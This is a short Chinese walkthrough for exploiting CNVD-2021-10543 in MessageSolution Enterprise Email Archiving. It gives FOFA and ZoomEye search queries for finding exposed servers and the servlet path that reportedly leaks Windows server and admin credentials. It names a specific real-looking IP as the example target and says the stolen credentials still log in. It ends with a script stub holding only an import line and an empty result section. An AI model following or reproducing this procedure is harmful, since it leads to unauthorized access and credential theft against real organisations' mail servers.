一 fofa寻找目标
Fofa搜索:
title=”MessageSolution Enterprise Email Archiving (EEA)”
title=”MessageSolution”

钟馗之眼搜索:
title:”MessageSolution”
二 打开https://IP/indexcommon.jsp

三 访问/authenticationserverservlet目录直接获取Windows服务器账号密码跟后台账号密码
例如:https://58.67.197.253/authenticationserverservlet

四 用账号密码登录成功,至今还未修复

如果别人也在登录,会显示登录失败
五 cnvd-2021-10543.py
1 | import requests |
执行结果